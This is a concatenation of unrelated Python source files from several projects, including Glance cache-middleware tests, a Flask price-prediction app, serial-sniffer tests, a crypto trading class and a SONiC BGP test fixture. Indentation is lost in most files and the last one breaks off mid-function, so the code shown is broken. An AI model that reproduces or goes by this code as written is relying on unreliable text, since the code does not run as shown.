# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from glance.api.middleware import cache_manage
from glance.api.v2 import cached_images
import glance.common.config
import glance.common.wsgi
import glance.image_cache
from glance.tests import utils as test_utils
from unittest import mock
import webob
class TestCacheManageFilter(test_utils.BaseTestCase):
@mock.patch.object(glance.image_cache.ImageCache, "init_driver")
def setUp(self, mock_init_driver):
super(TestCacheManageFilter, self).setUp()
self.stub_application_name = "stubApplication"
self.stub_value = "Stub value"
self.image_id = "image_id_stub"
mock_init_driver.return_value = None
self.cache_manage_filter = cache_manage.CacheManageFilter(
self.stub_application_name)
def test_bogus_request(self):
# prepare
bogus_request = webob.Request.blank("/bogus/")
# call
resource = self.cache_manage_filter.process_request(bogus_request)
# check
self.assertIsNone(resource)
@mock.patch.object(cached_images.CacheController, "get_cached_images")
def test_get_cached_images(self,
mock_get_cached_images):
# setup
mock_get_cached_images.return_value = self.stub_value
# prepare
request = webob.Request.blank("/v2/cached_images")
# call
resource = self.cache_manage_filter.process_request(request)
# check
mock_get_cached_images.assert_called_with(request)
self.assertEqual('"' + self.stub_value + '"',
resource.body.decode('utf-8'))
@mock.patch.object(cached_images.CacheController, "delete_cached_image")
def test_delete_cached_image(self,
mock_delete_cached_image):
# setup
mock_delete_cached_image.return_value = self.stub_value
# prepare
request = webob.Request.blank("/v2/cached_images/" + self.image_id,
environ={'REQUEST_METHOD': "DELETE"})
# call
resource = self.cache_manage_filter.process_request(request)
# check
mock_delete_cached_image.assert_called_with(request,
image_id=self.image_id)
self.assertEqual('"' + self.stub_value + '"',
resource.body.decode('utf-8'))
@mock.patch.object(cached_images.CacheController, "delete_cached_images")
def test_delete_cached_images(self,
mock_delete_cached_images):
# setup
mock_delete_cached_images.return_value = self.stub_value
# prepare
request = webob.Request.blank("/v2/cached_images",
environ={'REQUEST_METHOD': "DELETE"})
# call
resource = self.cache_manage_filter.process_request(request)
# check
mock_delete_cached_images.assert_called_with(request)
self.assertEqual('"' + self.stub_value + '"',
resource.body.decode('utf-8'))
@mock.patch.object(cached_images.CacheController, "queue_image")
def test_put_queued_image(self,
mock_queue_image):
# setup
mock_queue_image.return_value = self.stub_value
# prepare
request = webob.Request.blank("/v2/queued_images/" + self.image_id,
environ={'REQUEST_METHOD': "PUT"})
# call
resource = self.cache_manage_filter.process_request(request)
# check
mock_queue_image.assert_called_with(request, image_id=self.image_id)
self.assertEqual('"' + self.stub_value + '"',
resource.body.decode('utf-8'))
@mock.patch.object(cached_images.CacheController, "get_queued_images")
def test_get_queued_images(self,
mock_get_queued_images):
# setup
mock_get_queued_images.return_value = self.stub_value
# prepare
request = webob.Request.blank("/v2/queued_images")
# call
resource = self.cache_manage_filter.process_request(request)
# check
mock_get_queued_images.assert_called_with(request)
self.assertEqual('"' + self.stub_value + '"',
resource.body.decode('utf-8'))
@mock.patch.object(cached_images.CacheController, "delete_queued_image")
def test_delete_queued_image(self,
mock_delete_queued_image):
# setup
mock_delete_queued_image.return_value = self.stub_value
# prepare
request = webob.Request.blank("/v2/queued_images/" + self.image_id,
environ={'REQUEST_METHOD': 'DELETE'})
# call
resource = self.cache_manage_filter.process_request(request)
# check
mock_delete_queued_image.assert_called_with(request,
image_id=self.image_id)
self.assertEqual('"' + self.stub_value + '"',
resource.body.decode('utf-8'))
@mock.patch.object(cached_images.CacheController, "delete_queued_images")
def test_delete_queued_images(self,
mock_delete_queued_images):
# setup
mock_delete_queued_images.return_value = self.stub_value
# prepare
request = webob.Request.blank("/v2/queued_images",
environ={'REQUEST_METHOD': 'DELETE'})
# call
resource = self.cache_manage_filter.process_request(request)
# check
mock_delete_queued_images.assert_called_with(request)
self.assertEqual('"' + self.stub_value + '"',
resource.body.decode('utf-8'))
|
py | b40b32b201117a6595ade7605530ce6547b2d395 | import numpy as np
from numpy import reshape
from flask import Flask, request, jsonify, render_template
import pickle
app = Flask(__name__)
print(__name__)
model = pickle.load(open('model_pricing.pkl', 'rb'))
@app.route('/')
def home():
return render_template('index.html')
@app.route('/predict',methods=['POST'])
def predict():
'''
    For rendering results on the HTML GUI.
'''
print("request values : ", request.form.values())
int_features = [int(x) for x in request.form.values()]
print("int_features : ", int_features)
final_features = [np.array(int_features)]
print("final features : ", final_features)
final_features = reshape(final_features, (-1, 1)).T
print("Reshaped and Transformed final features : ", final_features)
prediction = model.predict(final_features)
print("predicted value : ", prediction)
output = round(prediction[0], 2)
print("rounded output : ", output)
return render_template('index.html', prediction_text='House Price should be $ {}'.format(output))
@app.route('/predict_api',methods=['POST'])
def predict_api():
'''
    For direct API calls through requests.
'''
data = request.get_json(force=True)
prediction = model.predict([np.array(list(data.values()))])
output = prediction[0]
print('Hello from predict_api ',output)
return jsonify(output)
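# A hedged example call for the JSON endpoint above (the field names are
# placeholders; they must match the feature order the pickled model expects):
#
#     curl -X POST -H "Content-Type: application/json" \
#          -d '{"feature1": 1, "feature2": 2}' http://localhost:5000/predict_api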
if __name__ == "__main__":
    app.run(debug=True)
|
py | b40b34acd24d11c4ccc9aad473852403ae25064b | import os
import time
from builtins import bytes
from datetime import datetime
from granola import SerialSniffer
from granola.utils import (
IS_PYTHON3,
check_min_package_version,
decode_bytes,
int_to_char,
load_serial_df,
)
if IS_PYTHON3:
from unittest.mock import patch
else:
from mock import patch
def test_read_still_works(sniff_sniff, mock_read, return_value=b"Serial's read was called"):
# Given a serial sniffer object
# When we call read
mock_read.return_value = return_value
# Then Serial's read function runs
assert return_value == sniff_sniff.read()
def test_write_still_works(sniff_sniff, mock_write, input=b"string\r"):
# Given a serial sniffer object and some input string
# When we write
mock_write.return_value = len(input)
# Then Serial's write function still runs
assert sniff_sniff.write(input) == 7
def test_sniffer_with_bad_outpath_doesnt_break_serial(mock_read, mock_write):
# Given a sniffer object with an absolute path to a file without permissions (in this case, a directory)
class BadSniffer(SerialSniffer):
outfile = "granola"
# When you initialize an object and call read and write with it.
bad_sniff = BadSniffer()
test_read_still_works(bad_sniff, mock_read)
test_write_still_works(bad_sniff, mock_write)
# Then there are no uncaught exceptions and read and write still work
def test_sniffer_given_no_port_or_path_uses_default():
# Given no com port or path
# When you create a sniffer object at some particular time
with patch("granola.serial_sniffer.datetime") as dt:
dt.now.return_value = datetime(2021, 9, 17, 16, 46, 7)
sniff_sniff = SerialSniffer()
true_outpath = "2021-09-17T16-46-07_serial_commands.csv"
# It creates an output file at ./[timestamp]_serial_commands.csv
assert sniff_sniff.outpath == os.path.abspath(true_outpath)
# and we cleanup the created sniffer file
os.remove(sniff_sniff.outpath)
def test_sniffer_given_port_only_uses_that_path():
# Given some comport
com = "COM3"
# When you create a sniffer object
with patch("serial.Serial.open"), patch("granola.serial_sniffer.datetime") as dt:
dt.now.return_value = datetime(2021, 9, 17, 16, 46, 7)
sniff_sniff = SerialSniffer(com, baudrate=9600)
# It creates a custom filename of the form [timestamp]_[port].csv
true_outpath = "2021-09-17T16-46-07_COM3.csv"
assert sniff_sniff.outpath == os.path.abspath(true_outpath)
# and we cleanup the created sniffer file
os.remove(sniff_sniff.outpath)
def test_sniffer_with_absolute_path_uses_that_path():
# Given a sniffer object with an absolute path
class AbsoluteSniffer(SerialSniffer):
outfile = os.path.abspath("some_output.csv")
# When you initialize an object with or without an associated com port
rel_sniff_no_com = AbsoluteSniffer()
with patch("serial.Serial.open"):
rel_sniff_com = AbsoluteSniffer("COM3")
# Then the output file is opened in the right directory
try:
assert os.path.exists(os.path.abspath("some_output.csv"))
finally:
# and we cleanup the created sniffer file
os.remove(rel_sniff_no_com.outpath)
# Then the sniffer given a comport had that same outpath, and was also cleaned up
assert not os.path.exists(rel_sniff_com.outpath)
def test_sniffer_with_relative_path_uses_that_path():
# Given a sniffer object with a relative path
path = "granola/tests/some_output.csv"
class AbsoluteSniffer(SerialSniffer):
outfile = path
# When you initialize an object
abs_sniff_no_com = AbsoluteSniffer()
with patch("serial.Serial.open"):
abs_sniff_com = AbsoluteSniffer("COM3")
# Then the output file is opened in the right directory
try:
assert os.path.exists(os.path.abspath("granola/tests/some_output.csv"))
finally:
# and we cleanup the created sniffer file
os.remove(abs_sniff_no_com.outpath)
# Then the sniffer given a comport had that same outpath, and was also cleaned up
assert not os.path.exists(abs_sniff_com.outpath)
def test_read_write_are_recorded_and_only_produce_one_row(mock_read, mock_write, sniff_sniff):
# Given a serial sniffer object and some command input and output
input = b"show\r"
output = b"Cereal 0.07.0 42\r>"
# When we write a command and read the response
mock_write.return_value = len(input)
sniff_sniff.write(input)
mock_read.return_value = output
sniff_sniff.read()
# Then the result is written to the csv
result = load_serial_df(sniff_sniff.outpath)
with open(sniff_sniff.outpath) as sniffer_out_file:
assert len(sniffer_out_file.readlines()) == 2
assert result["cmd"].iloc[0] == decode_bytes(input)
assert result["response"].iloc[0] == decode_bytes(output)
def test_two_sequential_writes_and_one_read_generates_only_one_row(mock_read, mock_write, sniff_sniff):
# Given a serial sniffer object and some command input and output
input = b"show\r"
output = b"Cereal 0.07.0 42\r>"
# When we read and then write
mock_write.return_value = len(input)
sniff_sniff.write(input)
sniff_sniff.write(input)
mock_read.return_value = output
sniff_sniff.read()
# Then the result is written to the csv, and there are not extra rows
result = load_serial_df(sniff_sniff.outpath)
assert len(result) == 1
assert result["cmd"].iloc[0] == decode_bytes(input)
assert result["response"].iloc[0] == decode_bytes(output)
def test_one_write_and_two_sequential_reads_ignores_unmatched_outputs(mock_read, mock_write, sniff_sniff):
# Given a serial sniffer object and some command input and output
input = b"show\r"
output = b"Cereal 0.07.0 42\r>"
# When we write and then read twice
mock_write.return_value = len(input)
sniff_sniff.write(input)
mock_read.return_value = output
sniff_sniff.read()
sniff_sniff.read()
# Then the result is written to the csv, and there are not extra rows
result = load_serial_df(sniff_sniff.outpath)
assert len(result) == 1
assert result["cmd"].iloc[0] == decode_bytes(input)
assert result["response"].iloc[0] == decode_bytes(output)
def test_read_write_in_pieces_produces_only_one_row(mock_read, mock_write, sniff_sniff):
# Given a serial sniffer object and some command input and output
input = b"show\r"
output = b"Cereal 0.07.0 42\r>"
# When we write a command character by character and then read the response character by character
for int_ in bytes(input):
mock_write.return_value = 1
sniff_sniff.write(int_to_char(int_))
for int_ in output:
mock_read.return_value = int_to_char(int_)
sniff_sniff.read()
# Then the result is written to the csv, and nothing else
result = load_serial_df(sniff_sniff.outpath)
assert len(result) == 1
assert result["cmd"].iloc[0] == decode_bytes(input)
assert result["response"].iloc[0] == decode_bytes(output)
def test_non_ascii_bytes_write_to_csv(mock_read, mock_write, sniff_sniff):
# Given a serial sniffer object and some command with non-ascii encoded outputs
input = b"scan\r"
output = b"\r\x92 yv c.dxu0~q }k0\x80qf|\x7f f.by~w0q 0lu||\x94\x7fu c.dxu0~q }k0\x80qf|\x7f f 0|y~w0 q.ru||\r>"
mock_write.return_value = len(input)
sniff_sniff.write(input)
mock_read.return_value = output
sniff_sniff.read()
# Then the result is written to the csv
result = load_serial_df(sniff_sniff.outpath)
with open(sniff_sniff.outpath) as sniffer_out_file:
assert len(sniffer_out_file.readlines()) == 2
assert result["cmd"].iloc[0] == decode_bytes(input)
assert result["response"].iloc[0] == decode_bytes(output)
def test_clear_input_buffer(mock_write, sniff_sniff):
# Given a serial sniffer and some input
input = b"some garbage"
# When you write the input and then call flush input in the appropriate version of pyserial
mock_write.return_value = len(input)
sniff_sniff.write(input)
if check_min_package_version("pyserial", "3.0"):
with patch("serial.Serial.reset_input_buffer"):
sniff_sniff.reset_input_buffer() # defined for pyserial versions >= 3.0
else:
with patch("serial.Serial.flushInput"):
sniff_sniff.flushInput() # defined for pyserial versions < 3.0
# Then the current write buffer will be empty
assert sniff_sniff.current_read == b""
def test_clear_output_buffer(mock_read, sniff_sniff):
# Given a serial sniffer and some input
output = b"some garbage"
# When you read some output and then call flush output in the appropriate version of pyserial
mock_read.return_value = output
sniff_sniff.read(output)
if check_min_package_version("pyserial", "3.0"):
with patch("serial.Serial.reset_output_buffer"):
sniff_sniff.reset_output_buffer() # defined for pyserial versions >= 3.0
else:
with patch("serial.Serial.flushOutput"):
sniff_sniff.flushOutput() # defined for pyserial versions < 3.0
# Then the current read buffer will be empty
assert sniff_sniff.current_write == b""
def test_delay_recorded(mock_read, mock_write, sniff_sniff):
# Given a serial sniffer object and some command input and output and a delay
input = b"show\r"
output = b"Cereal 0.07.0 42\r>"
delay = 1
# When we write a command and read the response
mock_write.return_value = len(input)
sniff_sniff.write(input)
time.sleep(delay)
mock_read.return_value = output
sniff_sniff.read()
# Then the result is written to the csv
result = load_serial_df(sniff_sniff.outpath)
assert result.loc[0, "delay(ms)"] >= delay * 1000
def test_reads_writes_length_of_terminator_still_behave(mock_read, mock_write, sniff_sniff):
# Given a serial sniffer object and some command input and output
input = b"\r"
output = b"\r>"
# When we read/write just the terminator
mock_write.return_value = len(input)
sniff_sniff.write(input)
mock_read.return_value = output
sniff_sniff.read()
# Then no errors are thrown and the lines are still written
result = load_serial_df(sniff_sniff.outpath)
assert result["cmd"].iloc[0] == decode_bytes(input)
assert result["response"].iloc[0] == decode_bytes(output)
|
py | b40b34c378121ad8190d704c6765215490dc7f58 | from cupy.core import core # NOQA
from cupy.core import internal # NOQA
# import class and function
from cupy.core.core import absolute # NOQA
from cupy.core.core import add # NOQA
from cupy.core.core import angle # NOQA
from cupy.core.core import array # NOQA
from cupy.core.core import array_split # NOQA
from cupy.core.core import ascontiguousarray # NOQA
from cupy.core.core import asfortranarray # NOQA
from cupy.core.core import bitwise_and # NOQA
from cupy.core.core import bitwise_or # NOQA
from cupy.core.core import bitwise_xor # NOQA
from cupy.core.core import broadcast # NOQA
from cupy.core.core import broadcast_to # NOQA
from cupy.core.core import concatenate_method # NOQA
from cupy.core.core import conj # NOQA
from cupy.core.core import create_comparison # NOQA
from cupy.core.core import create_reduction_func # NOQA
from cupy.core.core import create_ufunc # NOQA
from cupy.core.core import divide # NOQA
from cupy.core.core import divmod # NOQA
from cupy.core.core import dot # NOQA
from cupy.core.core import elementwise_copy # NOQA
from cupy.core.core import elementwise_copy_where # NOQA
from cupy.core.core import ElementwiseKernel # NOQA
from cupy.core.core import equal # NOQA
from cupy.core.core import floor_divide # NOQA
from cupy.core.core import greater # NOQA
from cupy.core.core import greater_equal # NOQA
from cupy.core.core import imag # NOQA
from cupy.core.core import invert # NOQA
from cupy.core.core import left_shift # NOQA
from cupy.core.core import less # NOQA
from cupy.core.core import less_equal # NOQA
from cupy.core.core import matmul # NOQA
from cupy.core.core import moveaxis # NOQA
from cupy.core.core import multiply # NOQA
from cupy.core.core import nanmax # NOQA
from cupy.core.core import nanmin # NOQA
from cupy.core.core import ndarray # NOQA
from cupy.core.core import negative # NOQA
from cupy.core.core import normalize_axis_tuple # NOQA
from cupy.core.core import not_equal # NOQA
from cupy.core.core import power # NOQA
from cupy.core.core import real # NOQA
from cupy.core.core import ReductionKernel # NOQA
from cupy.core.core import remainder # NOQA
from cupy.core.core import right_shift # NOQA
from cupy.core.core import rollaxis # NOQA
from cupy.core.core import size  # NOQA
from cupy.core.core import sqrt # NOQA
from cupy.core.core import subtract # NOQA
from cupy.core.core import tensordot_core # NOQA
from cupy.core.core import true_divide # NOQA
from cupy.core.core import ufunc # NOQA
from cupy.core.internal import complete_slice # NOQA
from cupy.core.internal import get_size # NOQA
|
py | b40b359bdfe50d2481e32755accc9d7a612e99fb | """
Panel is a high level app and dashboarding framework
====================================================
Panel is an open-source Python library that lets you create custom
interactive web apps and dashboards by connecting user-defined widgets
to plots, images, tables, or text.
Panel works with the tools you know and ❤️.
Check out https://panel.holoviz.org/
.. figure:: https://user-images.githubusercontent.com/42288570/152672367-6c239073-0ea0-4a2b-a4c0-817e8090e877.gif
:alt: Panel Dashboard
Panel Dashboard
How to develop a Panel app in 3 simple steps
--------------------------------------------
- Write the app
>>> import panel as pn
>>> pn.extension(sizing_mode="stretch_width", template="fast")
>>> pn.state.template.param.update(title="My Data App")
>>> pn.panel(some_python_object).servable()
- Run your app
$ panel serve my_script.py --autoreload --show
or
$ panel serve my_notebook.ipynb --autoreload --show
The app will be available in your browser!
- Change your code and save it
The app will reload with your changes!
You can also add automatic reload to jupyterlab. Check out
https://blog.holoviz.org/panel_0.12.0.html#JupyterLab-previews
To learn more about Panel check out
https://panel.holoviz.org/getting_started/index.html
"""
from . import layout # noqa
from . import links # noqa
from . import pane # noqa
from . import param # noqa
from . import pipeline # noqa
from . import reactive # noqa
from . import viewable # noqa
from . import widgets # noqa
from .config import config, panel_extension as extension, __version__ # noqa
from .depends import bind, depends # noqa
from .interact import interact # noqa
from .io import _jupyter_server_extension_paths, ipywidget, serve, state # noqa
from .layout import ( # noqa
Accordion, Card, Column, GridSpec, GridBox, FlexBox, Tabs, Row,
Spacer, WidgetBox
)
from .pane import panel, Pane # noqa
from .param import Param # noqa
from .template import Template # noqa
from .widgets import indicators # noqa
__all__ = (
"__version__",
"Accordion",
"Card",
"Column",
"FlexBox",
"GridBox",
"GridSpec",
"Pane", # deprecated
"Param",
"Row",
"Spacer",
"Tabs",
"Template",
"WidgetBox",
"bind",
"config",
"depends",
"extension",
"indicators",
"interact",
"ipywidget",
"layout",
"links",
"pane",
"panel",
"param",
"pipeline",
"reactive",
"serve",
"state",
"viewable",
"widgets",
)
|
py | b40b35ffa139c36d9610fe529d42b490755c43dc | #%%
from os import environ
environ['MLFLOW_TRACKING_URI'] = 'http://tracking.olympus.nintorac.dev:9001/'
from neuralDX7.constants import N_PARAMS, MAX_VALUE
from agoge.utils import trial_name_creator
from neuralDX7 import DEFAULTS
from agoge import TrainWorker as Worker
from ray import tune
from neuralDX7.models import DX7VAE as Model
from neuralDX7.solvers import DX7VAE as Solver
from neuralDX7.datasets import DX7SysexDataset as Dataset
def config(experiment_name, trial_name,
n_heads=8, n_features=64,
batch_size=16, data_size=1.,
latent_dim=8, num_flows=16,
**kwargs):
data_handler = {
'Dataset': Dataset,
'dataset_opts': {
'data_size': data_size
},
'loader_opts': {
'batch_size': batch_size,
},
}
### MODEL FEATURES
layer_features = n_heads * n_features
head_features = layer_features // n_heads
attention = {
'n_features': layer_features,
'n_hidden': head_features,
'n_heads': n_heads
}
attention_layer = {
'attention': attention,
'features': layer_features,
'hidden_dim': layer_features * 3
}
encoder = {
'features': layer_features,
'attention_layer': attention_layer,
'max_len': N_PARAMS,
'n_layers': 12
}
model = {
'Model': Model,
'features': layer_features,
'latent_dim': latent_dim,
'encoder': encoder,
'decoder': {
'c_features': latent_dim,
'features': layer_features,
'attention_layer': attention_layer,
'max_len': N_PARAMS,
'n_layers': 12
},
'num_flows': num_flows,
'deterministic_path_drop_rate': 0.8
}
solver = {
'Solver': Solver,
'beta_temp': 6e-5,
'max_beta': 0.5
}
tracker = {
'metrics': [
'reconstruction_loss',
'accuracy',
'kl',
'beta',
'log_det',
'q_z_0',
'p_z_k',
],
'experiment_name': experiment_name,
'trial_name': trial_name
}
return {
'data_handler': data_handler,
'model': model,
'solver': solver,
'tracker': tracker,
}
if __name__=='__main__':
# from ray import ray
import sys
postfix = sys.argv[1] if len(sys.argv)==2 else ''
# ray.init()
# from ray.tune.utils import validate_save_restore
# validate_save_restore(Worker)
# client = MlflowClient(tracking_uri='localhost:5000')
    experiment_name = 'dx7-vae-dev'  # + experiment_name_creator()
# experiment_id = client.create_experiment(experiment_name)
experiment_metrics = dict(metric="loss/accuracy", mode="max")
tune.run(Worker,
config={
'config_generator': config,
'experiment_name': experiment_name,
'points_per_epoch': 10
},
trial_name_creator=trial_name_creator,
resources_per_trial={
# 'gpu': 1
# 'cpu': 5
},
checkpoint_freq=2,
checkpoint_at_end=True,
keep_checkpoints_num=1,
# search_alg=bohb_search,
# scheduler=bohb_hyperband,
num_samples=1,
verbose=0,
local_dir=DEFAULTS['ARTIFACTS_ROOT']
# webui_host='127.0.0.1' ## supresses an error
# stop={'loss/loss': 0}
)
# points_per_epoch
# %%
|
py | b40b37d7f3a1289b7643ed0304e2da879605d293 | import os
from qgis.core import QgsFeature, QgsField, QgsFields
from qgis.PyQt.QtCore import QVariant
from catatom2osm.geo.geometry import Geometry
from catatom2osm.geo.layer.base import BaseLayer
from catatom2osm.geo.types import WKBPoint
class DebugWriter:
"""A QgsVectorFileWriter for debugging purposess."""
def __init__(
self, filename, layer, driver_name="ESRI Shapefile", geom_type=WKBPoint
):
"""
Construct.
        Args:
            filename (str): File name of this layer.
            layer (QgsVectorLayer): Layer whose data source path and CRS
                are reused for the output.
            driver_name (str): Output driver. Defaults to ESRI Shapefile.
            geom_type (int): WKB geometry type of the output. Defaults
                to WKBPoint.
        """
fpath = os.path.join(
os.path.dirname(layer.dataProvider().dataSourceUri()), filename
)
fields = QgsFields()
fields.append(QgsField("note", QVariant.String, len=100))
writer = BaseLayer.get_writer(fpath, layer.crs(), fields, geom_type)
self.fields = fields
self.writer = writer
def add_point(self, point, note=None):
"""Add a point to the layer with the attribute note."""
feat = QgsFeature(QgsFields(self.fields))
geom = Geometry.fromPointXY(point)
feat.setGeometry(geom)
if note:
feat.setAttribute("note", note[:254])
return self.addFeature(feat)
def addFeature(self, *args, **kwargs):
        return self.writer.addFeature(*args, **kwargs)
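# Usage sketch (illustrative, not part of the module): `layer` is assumed to be
# an existing QgsVectorLayer and `point` a QgsPointXY; the filename is
# hypothetical.
#
#   writer = DebugWriter("debug_notes.shp", layer)
#   writer.add_point(point, note="vertex flagged during simplification")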
|
py | b40b38501f5f6040f163a52ff0e5a258c856969f | import math
from decimal import Decimal
from os import environ
from typing import Optional, List, Dict, Type
from sqlalchemy.orm import Session
from lib.account.account import Account
from lib.asset.asset_manager import AssetManager
from lib.exchange.exchange import Exchange
from lib.order.order_meta import OrderMeta
from lib.order.order import Order
from lib.order.order_repository import OrderRepository
from lib.order.order_type import OrderType
from lib.strategy.aroon import Aroon
from lib.strategy.base_strategy import BaseStrategy
import lib.logger as logger
from lib.strategy.cci import Cci
from lib.strategy.dc_breakout import DcBreakout
from lib.strategy.rsi_bb import RsiBb
from lib.strategy.stoch_rsi import StochRsi
def get_trading_tickers() -> List[str]:
"""get tickers open for trade"""
return ["BTC", "ETH"]
def get_trading_strategies_by_ticker(tickers: List[str], override_strategy: Optional[Type[BaseStrategy]] = None) -> Dict[str, List[Type[BaseStrategy]]]:
default_strategies = [DcBreakout, Aroon, Cci, RsiBb, StochRsi]
strategies = [override_strategy] if override_strategy is not None else default_strategies
return { ticker: strategies for ticker in tickers }
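# Example (illustrative): get_trading_strategies_by_ticker(["BTC", "ETH"])
# returns {"BTC": [DcBreakout, Aroon, Cci, RsiBb, StochRsi], "ETH": [...]},
# while passing override_strategy=Aroon maps every ticker to [Aroon] only.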
class Trader:
asset_manager: AssetManager
exchange: Exchange
sess: Session
account: Account
order_repository: OrderRepository
account_risk_ratio = Decimal("0.01")
stoploss_ratio = Decimal("0.1")
def __init__(self,
asset_manager: AssetManager,
exchange: Exchange,
sess: Session,
account: Account,
order_repository: OrderRepository):
self.asset_manager = asset_manager
self.exchange = exchange
self.sess = sess
self.account = account
self.order_repository = order_repository
def trade(self, ticker: str, strategy: BaseStrategy, position_size: Optional[str] = None) -> Optional[Order]:
amount = Decimal(position_size) if position_size else self.get_position_size()
last_order = self.order_repository.get_last_order(
ticker=ticker,
strategy=strategy.get_name(),
account_id=self.account.get_id()
)
should_buy = (not last_order or (last_order.get_order_type() == OrderType.SELL and last_order.is_filled())) and strategy.should_buy() and amount > Decimal("0")
should_sell = last_order and last_order.is_filled() and last_order.get_order_type() == OrderType.BUY and strategy.should_sell()
logger.info(f"last order = {last_order}, should buy = {should_buy}, should sell = {should_sell}")
order = None
if should_buy:
order = self.exchange.buy(ticker=ticker, amount=amount)
if should_sell:
order = self.exchange.sell(ticker=ticker, volume=last_order.get_volume())
if order:
meta = OrderMeta.parse_obj(
dict(
strategy=strategy.get_name(),
account_id=self.account.get_id()
)
)
logger.info(f"order placed, order = {order}, meta = {meta}")
self.on_trade_success(order, meta)
return order
def get_position_size(self) -> Decimal:
cash = self.asset_manager.get_cash()
position_size = Decimal(math.floor(((self.asset_manager.get_account_size() * self.account_risk_ratio) / self.stoploss_ratio)))
return position_size if cash >= position_size else Decimal("0")
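    # Worked example (illustrative numbers): with an account size of 10000,
    # account_risk_ratio 0.01 and stoploss_ratio 0.1, the position size is
    # floor((10000 * 0.01) / 0.1) = 1000, provided at least 1000 in cash is
    # available; otherwise Decimal("0") is returned and no buy is placed.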
def on_trade_success(self, order: Order, meta: OrderMeta) -> None:
self.order_repository.add_order(order, meta)
|
py | b40b38c97634aee2fc38b9559674a70d366b1327 | import pytest
from netaddr import *
import time
import logging
import requests
import ipaddress
import json
from tests.common import constants
from tests.common.fixtures.ptfhost_utils import copy_ptftests_directory # lgtm[py/unused-import]
from tests.common.fixtures.ptfhost_utils import set_ptf_port_mapping_mode # lgtm[py/unused-import]
from tests.common.fixtures.ptfhost_utils import change_mac_addresses # lgtm[py/unused-import]
from tests.common.fixtures.ptfhost_utils import remove_ip_addresses # lgtm[py/unused-import]
from tests.ptf_runner import ptf_runner
from tests.common.utilities import wait_tcp_connection
from tests.common.helpers.assertions import pytest_require
from tests.common.utilities import wait_until
pytestmark = [
pytest.mark.topology('t0'),
pytest.mark.device_type('vs')
]
logger = logging.getLogger(__name__)
PTF_TEST_PORT_MAP = '/root/ptf_test_port_map.json'
def generate_ips(num, prefix, exclude_ips):
"""
Generate random ips within prefix
"""
prefix = IPNetwork(prefix)
exclude_ips.append(prefix.broadcast)
exclude_ips.append(prefix.network)
generated_ips = []
for available_ip in prefix:
if available_ip not in exclude_ips:
generated_ips.append(IPNetwork(str(available_ip) + '/' + str(prefix.prefixlen)))
if len(generated_ips) == num:
break
else:
raise Exception("Not enough available IPs")
return generated_ips
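# Example (illustrative): generate_ips(2, "192.168.0.0/30", []) excludes the
# network (192.168.0.0) and broadcast (192.168.0.3) addresses and returns
# [IPNetwork("192.168.0.1/30"), IPNetwork("192.168.0.2/30")]. Note that the
# exclude_ips list passed in is mutated to include those two addresses.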
def announce_route(ptfip, neighbor, route, nexthop, port):
change_route("announce", ptfip, neighbor, route, nexthop, port)
def withdraw_route(ptfip, neighbor, route, nexthop, port):
change_route("withdraw", ptfip, neighbor, route, nexthop, port)
def change_route(operation, ptfip, neighbor, route, nexthop, port):
url = "http://%s:%d" % (ptfip, port)
data = {"command": "neighbor %s %s route %s next-hop %s" % (neighbor, operation, route, nexthop)}
r = requests.post(url, data=data)
assert r.status_code == 200
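# Example (illustrative values): change_route("announce", "10.0.0.100",
# "10.1.0.32", "10.10.10.0/26", "192.168.0.2", 7000) posts the exabgp API
# command "neighbor 10.1.0.32 announce route 10.10.10.0/26 next-hop
# 192.168.0.2" to http://10.0.0.100:7000; withdraw_route sends the same
# command with "withdraw" in place of "announce".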
@pytest.fixture(scope="module", autouse=True)
def skip_dualtor(tbinfo):
"""Skip running `test_bgp_speaker` over dualtor."""
pytest_require("dualtor" not in tbinfo["topo"]["name"], "Skip 'test_bgp_speaker over dualtor.'")
@pytest.fixture(scope="module")
def common_setup_teardown(duthosts, rand_one_dut_hostname, ptfhost, localhost, tbinfo):
logger.info("########### Setup for bgp speaker testing ###########")
duthost = duthosts[rand_one_dut_hostname]
ptfip = ptfhost.mgmt_ip
logger.info("ptfip=%s" % ptfip)
mg_facts = duthost.get_extended_minigraph_facts(tbinfo)
interface_facts = duthost.interface_facts()['ansible_facts']
constants_stat = duthost.stat(path="/etc/sonic/constants.yml")
if constants_stat["stat"]["exists"]:
res = duthost.shell("sonic-cfggen -m -d -y /etc/sonic/constants.yml -v \"constants.deployment_id_asn_map[DEVICE_METADATA['localhost']['deployment_id']]\"")
else:
res = duthost.shell("sonic-cfggen -m -d -y /etc/sonic/deployment_id_asn_map.yml -v \"deployment_id_asn_map[DEVICE_METADATA['localhost']['deployment_id']]\"")
bgp_speaker_asn = res['stdout']
vlan_ips = generate_ips(3, "%s/%s" % (mg_facts['minigraph_vlan_interfaces'][0]['addr'],
mg_facts['minigraph_vlan_interfaces'][0]['prefixlen']),
[IPAddress(mg_facts['minigraph_vlan_interfaces'][0]['addr'])])
logger.info("Generated vlan_ips: %s" % str(vlan_ips))
speaker_ips = generate_ips(2, mg_facts['minigraph_bgp_peers_with_range'][0]['ip_range'][0], [])
speaker_ips.append(vlan_ips[0])
logger.info("speaker_ips: %s" % str(speaker_ips))
port_num = [7000, 8000, 9000]
lo_addr = mg_facts['minigraph_lo_interfaces'][0]['addr']
lo_addr_prefixlen = int(mg_facts['minigraph_lo_interfaces'][0]['prefixlen'])
vlan_addr = mg_facts['minigraph_vlan_interfaces'][0]['addr']
vlan_ports = []
for i in range(0, 3):
vlan_ports.append(mg_facts['minigraph_ptf_indices'][mg_facts['minigraph_vlans'][mg_facts['minigraph_vlan_interfaces'][0]['attachto']]['members'][i]])
if "backend" in tbinfo["topo"]["name"]:
vlan_id = mg_facts['minigraph_vlans'][mg_facts['minigraph_vlan_interfaces'][0]['attachto']]['vlanid']
ptf_ports = [("eth%s" % _) + constants.VLAN_SUB_INTERFACE_SEPARATOR + vlan_id for _ in vlan_ports]
else:
ptf_ports = ["eth%s" % _ for _ in vlan_ports]
logger.info("vlan_ports: %s" % str(vlan_ports))
logger.info("ptf_ports: %s", ptf_ports)
# Generate ipv6 nexthops
vlan_ipv6_entry = mg_facts['minigraph_vlan_interfaces'][1]
vlan_ipv6_prefix = "%s/%s" % (vlan_ipv6_entry["addr"], vlan_ipv6_entry["prefixlen"])
vlan_ipv6_address = vlan_ipv6_entry["addr"]
